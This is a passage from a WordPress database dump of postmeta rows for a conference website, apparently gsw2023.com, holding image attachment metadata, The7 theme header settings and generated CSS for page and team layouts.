(16079,2930,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:727;s:6:\"height\";i:625;s:4:\"file\";s:17:\"2022/10/ext11.jpg\";s:8:\"filesize\";i:148654;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"ext11-300x258.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21850;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"ext11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7370;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(16080,2936,'_wp_attached_file','2022/10/ext111.jpg'),
(16081,2936,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:918;s:6:\"height\";i:436;s:4:\"file\";s:18:\"2022/10/ext111.jpg\";s:8:\"filesize\";i:48462;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"ext111-300x142.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:142;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7330;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"ext111-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4325;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"ext111-768x365.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:365;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24727;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(16082,2946,'_edit_lock','1667407582:1'),
(16083,2946,'_edit_last','1'),
(16084,2946,'_dt_sidebar_position','disabled'),
(16085,2946,'_dt_sidebar_widgetarea_id','sidebar_1'),
(16086,2946,'_dt_sidebar_hide_on_mobile','0'),
(16087,2946,'_dt_footer_show','0'),
(16088,2946,'_dt_footer_widgetarea_id','sidebar_2'),
(16089,2946,'_dt_footer_hide_on_mobile','0'),
(16090,2946,'_dt_header_title','fancy'),
(16091,2946,'_dt_header_background','normal'),
(16092,2946,'_dt_header_background_below_slideshow','disabled'),
(16093,2946,'_dt_header_transparent_bg_color_scheme','light'),
(16094,2946,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(16095,2946,'_dt_header_transparent_top_bar_bg_opacity','25'),
(16096,2946,'_dt_header_transparent_bg_color','#000000'),
(16097,2946,'_dt_header_transparent_bg_opacity','50'),
(16098,2946,'_dt_header_disabled_background','normal'),
(16099,2946,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(16100,2946,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(16101,2946,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(16102,2946,'_dt_header_disabled_transparent_bg_color','#000000'),
(16103,2946,'_dt_header_disabled_transparent_bg_opacity','50'),
(16104,2946,'_dt_page_overrides_top_margin',''),
(16105,2946,'_dt_page_overrides_right_margin',''),
(16106,2946,'_dt_page_overrides_bottom_margin',''),
(16107,2946,'_dt_page_overrides_left_margin',''),
(16108,2946,'_dt_mobile_page_padding_top',''),
(16109,2946,'_dt_mobile_page_padding_right',''),
(16110,2946,'_dt_mobile_page_padding_bottom',''),
(16111,2946,'_dt_mobile_page_padding_left',''),
(16112,2946,'_dt_fancy_header_layout_heading',''),
(16113,2946,'_dt_fancy_header_title_aligment','center'),
(16114,2946,'_dt_fancy_header_height','300'),
(16115,2946,'_dt_fancy_header_padding-top','0px'),
(16116,2946,'_dt_fancy_header_padding-bottom','0px'),
(16117,2946,'_dt_fancy_header_breadcrumbs_heading',''),
(16118,2946,'_dt_fancy_header_breadcrumbs','disabled'),
(16119,2946,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(16120,2946,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(16121,2946,'_dt_fancy_header_title_heading',''),
(16122,2946,'_dt_fancy_header_title_mode','custom'),
(16123,2946,'_dt_fancy_header_title','Jan Boehm,  University College London, United Kingdom  (WG II/2)'),
(16124,2946,'_dt_fancy_header_title_font_size','30'),
(16125,2946,'_dt_fancy_header_title_line_height','36'),
(16126,2946,'_dt_fancy_header_text_transform','none'),
(16127,2946,'_dt_fancy_header_title_color_mode','color'),
(16128,2946,'_dt_fancy_header_title_color','#ffffff'),
(16129,2946,'_dt_fancy_header_subtitle_heading',''),
(16130,2946,'_dt_fancy_header_subtitle',''),
(16131,2946,'_dt_fancy_header_subtitle_font_size','18'),
(16132,2946,'_dt_fancy_header_subtitle_line_height','26'),
(16133,2946,'_dt_fancy_header_subtitle_text_transform','none'),
(16134,2946,'_dt_fancy_header_subtitle_color_mode','color'),
(16135,2946,'_dt_fancy_header_subtitle_color','#ffffff'),
(16136,2946,'_dt_fancy_header_bg_heading',''),
(16137,2946,'_dt_fancy_header_bg_color','#222222'),
(16138,2946,'_dt_fancy_header_bg_image_origin','custom'),
(16139,2946,'_dt_fancy_header_bg_image','a:0:{}'),
(16140,2946,'_dt_fancy_header_bg_repeat','no-repeat'),
(16141,2946,'_dt_fancy_header_bg_position_x','center'),
(16142,2946,'_dt_fancy_header_bg_position_y','center'),
(16143,2946,'_dt_fancy_header_bg_fullscreen','1'),
(16144,2946,'_dt_fancy_header_bg_overlay','0'),
(16145,2946,'_dt_fancy_header_overlay_color','#000'),
(16146,2946,'_dt_fancy_header_bg_overlay_opacity','50'),
(16147,2946,'_dt_fancy_header_scroll_effect','default'),
(16148,2946,'_dt_fancy_header_bg_parallax','0.5'),
(16149,2946,'_dt_fancy_header_responsiveness_heading',''),
(16150,2946,'_dt_fancy_header_responsiveness','enabled'),
(16151,2946,'_dt_fancy_header_responsiveness_switch','778px'),
(16152,2946,'_dt_fancy_header_responsive_height','70'),
(16153,2946,'_dt_fancy_header_responsive_font_size','30'),
(16154,2946,'_dt_fancy_header_responsive_title_line_height','38'),
(16155,2946,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(16156,2946,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(16157,2946,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(16158,2946,'_dt_teammate_options_go_to_single','1'),
(16159,2946,'_dt_teammate_options_position',''),
(16160,2946,'_dt_teammate_options_website',''),
(16161,2946,'_dt_teammate_options_mail',''),
(16162,2946,'_dt_teammate_options_facebook',''),
(16163,2946,'_dt_teammate_options_twitter',''),
(16164,2946,'_dt_teammate_options_dribbble',''),
(16165,2946,'_dt_teammate_options_you-tube',''),
(16166,2946,'_dt_teammate_options_rss',''),
(16167,2946,'_dt_teammate_options_delicious',''),
(16168,2946,'_dt_teammate_options_flickr',''),
(16169,2946,'_dt_teammate_options_lastfm',''),
(16170,2946,'_dt_teammate_options_linkedin',''),
(16171,2946,'_dt_teammate_options_vimeo',''),
(16172,2946,'_dt_teammate_options_tumbler',''),
(16173,2946,'_dt_teammate_options_pinterest',''),
(16174,2946,'_dt_teammate_options_devian',''),
(16175,2946,'_dt_teammate_options_skype',''),
(16176,2946,'_dt_teammate_options_github',''),
(16177,2946,'_dt_teammate_options_instagram',''),
(16178,2946,'_dt_teammate_options_stumbleupon',''),
(16179,2946,'_dt_teammate_options_behance',''),
(16180,2946,'_dt_teammate_options_px-500',''),
(16181,2946,'_dt_teammate_options_tripedvisor',''),
(16182,2946,'_dt_teammate_options_vk',''),
(16183,2946,'_dt_teammate_options_foursquare',''),
(16184,2946,'_dt_teammate_options_xing',''),
(16185,2946,'_dt_teammate_options_weibo',''),
(16186,2946,'_dt_teammate_options_odnoklassniki',''),
(16187,2946,'_dt_teammate_options_research-gate',''),
(16188,2946,'_dt_teammate_options_yelp',''),
(16189,2946,'_dt_teammate_options_blogger',''),
(16190,2946,'_dt_teammate_options_soundcloud',''),
(16191,2946,'_dt_teammate_options_viber',''),
(16192,2946,'_dt_teammate_options_whatsapp',''),
(16193,2946,'_dt_teammate_options_reddit',''),
(16194,2946,'_dt_teammate_options_snapchat',''),
(16195,2946,'_dt_teammate_options_telegram',''),
(16196,2946,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(16197,2948,'_wp_attached_file','2022/11/w171.jpg'),
(16198,2948,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:142;s:6:\"height\";i:142;s:4:\"file\";s:16:\"2022/11/w171.jpg\";s:8:\"filesize\";i:6688;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(16199,2946,'_thumbnail_id','2948'),
(16200,2949,'_edit_lock','1675606979:1'),
(16201,2950,'_wp_attached_file','2022/11/m171.jpg'),
(16202,2950,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:596;s:6:\"height\";i:346;s:4:\"file\";s:16:\"2022/11/m171.jpg\";s:8:\"filesize\";i:91204;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"m171-300x174.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19199;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"m171-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9942;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(16203,2949,'_thumbnail_id','2950'),
(16204,2949,'_edit_last','1'),
(16205,2949,'_wpb_vc_js_status','true'),
(16206,2949,'_dt_sidebar_position','disabled'),
(16207,2949,'_dt_sidebar_widgetarea_id','sidebar_1'),
(16208,2949,'_dt_sidebar_hide_on_mobile','0'),
(16209,2949,'_dt_footer_show','0'),
(16210,2949,'_dt_footer_widgetarea_id','sidebar_2'),
(16211,2949,'_dt_footer_hide_on_mobile','0'),
(16212,2949,'_dt_header_title','fancy'),
(16213,2949,'_dt_header_background','normal'),
(16214,2949,'_dt_header_background_below_slideshow','disabled'),
(16215,2949,'_dt_header_transparent_bg_color_scheme','light'),
(16216,2949,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(16217,2949,'_dt_header_transparent_top_bar_bg_opacity','25'),
(16218,2949,'_dt_header_transparent_bg_color','#000000'),
(16219,2949,'_dt_header_transparent_bg_opacity','50'),
(16220,2949,'_dt_header_disabled_background','normal'),
(16221,2949,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(16222,2949,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(16223,2949,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(16224,2949,'_dt_header_disabled_transparent_bg_color','#000000'),
(16225,2949,'_dt_header_disabled_transparent_bg_opacity','50'),
(16226,2949,'_dt_page_overrides_top_margin',''),
(16227,2949,'_dt_page_overrides_right_margin',''),
(16228,2949,'_dt_page_overrides_bottom_margin',''),
(16229,2949,'_dt_page_overrides_left_margin',''),
(16230,2949,'_dt_mobile_page_padding_top',''),
(16231,2949,'_dt_mobile_page_padding_right',''),
(16232,2949,'_dt_mobile_page_padding_bottom',''),
(16233,2949,'_dt_mobile_page_padding_left',''),
(16234,2949,'_dt_fancy_header_layout_heading',''),
(16235,2949,'_dt_fancy_header_title_aligment','center'),
(16236,2949,'_dt_fancy_header_height','300'),
(16237,2949,'_dt_fancy_header_padding-top','0px'),
(16238,2949,'_dt_fancy_header_padding-bottom','0px'),
(16239,2949,'_dt_fancy_header_breadcrumbs_heading',''),
(16240,2949,'_dt_fancy_header_breadcrumbs','disabled'),
(16241,2949,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(16242,2949,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(16243,2949,'_dt_fancy_header_title_heading',''),
(16244,2949,'_dt_fancy_header_title_mode','custom'),
(16245,2949,'_dt_fancy_header_title',''),
(16246,2949,'_dt_fancy_header_title_font_size','30'),
(16247,2949,'_dt_fancy_header_title_line_height','36'),
(16248,2949,'_dt_fancy_header_text_transform','none'),
(16249,2949,'_dt_fancy_header_title_color_mode','color'),
(16250,2949,'_dt_fancy_header_title_color','#000000'),
(16251,2949,'_dt_fancy_header_subtitle_heading',''),
(16252,2949,'_dt_fancy_header_subtitle',''),
(16253,2949,'_dt_fancy_header_subtitle_font_size','18'),
(16254,2949,'_dt_fancy_header_subtitle_line_height','26'),
(16255,2949,'_dt_fancy_header_subtitle_text_transform','none'),
(16256,2949,'_dt_fancy_header_subtitle_color_mode','color'),
(16257,2949,'_dt_fancy_header_subtitle_color','#ffffff'),
(16258,2949,'_dt_fancy_header_bg_heading',''),
(16259,2949,'_dt_fancy_header_bg_color','#222222'),
(16260,2949,'_dt_fancy_header_bg_image_origin','featured_image'),
(16261,2949,'_dt_fancy_header_bg_image','a:0:{}'),
(16262,2949,'_dt_fancy_header_bg_repeat','no-repeat'),
(16263,2949,'_dt_fancy_header_bg_position_x','center'),
(16264,2949,'_dt_fancy_header_bg_position_y','center'),
(16265,2949,'_dt_fancy_header_bg_fullscreen','1'),
(16266,2949,'_dt_fancy_header_bg_overlay','0'),
(16267,2949,'_dt_fancy_header_overlay_color','#000'),
(16268,2949,'_dt_fancy_header_bg_overlay_opacity','50'),
(16269,2949,'_dt_fancy_header_scroll_effect','default'),
(16270,2949,'_dt_fancy_header_bg_parallax','0.5'),
(16271,2949,'_dt_fancy_header_responsiveness_heading',''),
(16272,2949,'_dt_fancy_header_responsiveness','enabled'),
(16273,2949,'_dt_fancy_header_responsiveness_switch','778px'),
(16274,2949,'_dt_fancy_header_responsive_height','70'),
(16275,2949,'_dt_fancy_header_responsive_font_size','30'),
(16276,2949,'_dt_fancy_header_responsive_title_line_height','38'),
(16277,2949,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(16278,2949,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(16279,2949,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(16280,2949,'_dt_project_options_back_button',''),
(16281,2949,'_dt_project_options_show_link',''),
(16282,2949,'_dt_project_options_link',''),
(16283,2949,'_dt_project_options_link_target',''),
(16284,2949,'_dt_project_options_link_name',''),
(16285,2949,'_dt_project_options_hide_thumbnail','1'),
(16286,2949,'_dt_project_options_open_thumbnail_in_lightbox','0'),
(16287,2949,'_dt_project_options_related_mode','same'),
(16288,2949,'_dt_project_options_preview','normal'),
(16289,2949,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2022/11/m171.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #000000;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(16290,2949,'_wp_page_template','default'),
(16291,2949,'_dt_microsite_primary_menu',''),
(16292,2949,'_dt_microsite_split_left_menu',''),
(16293,2949,'_dt_microsite_split_right_menu',''),
(16294,2949,'_dt_microsite_mobile_menu',''),
(16295,2953,'_wp_attached_file','2022/11/m174-e1667404147960.jpg'),
(16296,2953,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:160;s:6:\"height\";i:160;s:4:\"file\";s:31:\"2022/11/m174-e1667404147960.jpg\";s:8:\"filesize\";i:11153;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:31:\"m174-e1667404147960-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6918;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(16297,2953,'_edit_lock','1667406727:1'),
(16298,2953,'_wp_attachment_backup_sizes','a:4:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:160;s:6:\"height\";i:160;s:4:\"file\";s:8:\"m174.jpg\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:16:\"m174-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6339;}s:18:\"full-1667404147960\";a:3:{s:5:\"width\";i:160;s:6:\"height\";i:160;s:4:\"file\";s:23:\"m174-e1667404128319.jpg\";}s:23:\"thumbnail-1667404147960\";a:5:{s:4:\"file\";s:31:\"m174-e1667404128319-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6339;}}'),
(16299,2953,'_edit_last','1'),
(16300,2953,'_wp_page_template','default'),
(16301,2953,'dt-video-url',''),
(16302,2953,'dt-img-link',''),
(16303,2953,'dt-img-hide-title','0'),
(16304,2954,'_wp_attached_file','2022/11/m173.jpg'),
(16305,2954,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:160;s:6:\"height\";i:134;s:4:\"file\";s:16:\"2022/11/m173.jpg\";s:8:\"filesize\";i:8265;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"m173-150x134.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:134;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5964;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(16306,2955,'_wp_attached_file','2022/11/m172.jpg'),
(16307,2955,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:160;s:6:\"height\";i:158;s:4:\"file\";s:16:\"2022/11/m172.jpg\";s:8:\"filesize\";i:9363;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"m172-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5900;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(16308,2949,'the7_shortcodes_dynamic_css','a:2:{s:32:\"570862b525b9f64cbffe0afe3a2eddab\";s:6508:\".dt-team-shortcode.team-masonry-shortcode-id-570862b525b9f64cbffe0afe3a2eddab .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-570862b525b9f64cbffe0afe3a2eddab .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-570862b525b9f64cbffe0afe3a2eddab .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-570862b525b9f64cbffe0afe3a2eddab .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-570862b525b9f64cbffe0afe3a2eddab  .team-media {\n  padding: 0px 0px 0px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-570862b525b9f64cbffe0afe3a2eddab .dt-css-grid .team-media img {\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-570862b525b9f64cbffe0afe3a2eddab .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-570862b525b9f64cbffe0afe3a2eddab  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-570862b525b9f64cbffe0afe3a2eddab  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-570862b525b9f64cbffe0afe3a2eddab  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-570862b525b9f64cbffe0afe3a2eddab  .team-media img {\n  border-radius: 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-570862b525b9f64cbffe0afe3a2eddab .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-570862b525b9f64cbffe0afe3a2eddab .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-570862b525b9f64cbffe0afe3a2eddab .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-570862b525b9f64cbffe0afe3a2eddab .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-570862b525b9f64cbffe0afe3a2eddab .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-570862b525b9f64cbffe0afe3a2eddab .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-570862b525b9f64cbffe0afe3a2eddab .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-570862b525b9f64cbffe0afe3a2eddab .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-570862b525b9f64cbffe0afe3a2eddab .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-570862b525b9f64cbffe0afe3a2eddab .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-570862b525b9f64cbffe0afe3a2eddab .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-570862b525b9f64cbffe0afe3a2eddab .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-570862b525b9f64cbffe0afe3a2eddab:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-570862b525b9f64cbffe0afe3a2eddab:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-570862b525b9f64cbffe0afe3a2eddab:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-570862b525b9f64cbffe0afe3a2eddab:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-570862b525b9f64cbffe0afe3a2eddab:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-570862b525b9f64cbffe0afe3a2eddab.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-570862b525b9f64cbffe0afe3a2eddab.resize-by-browser-width 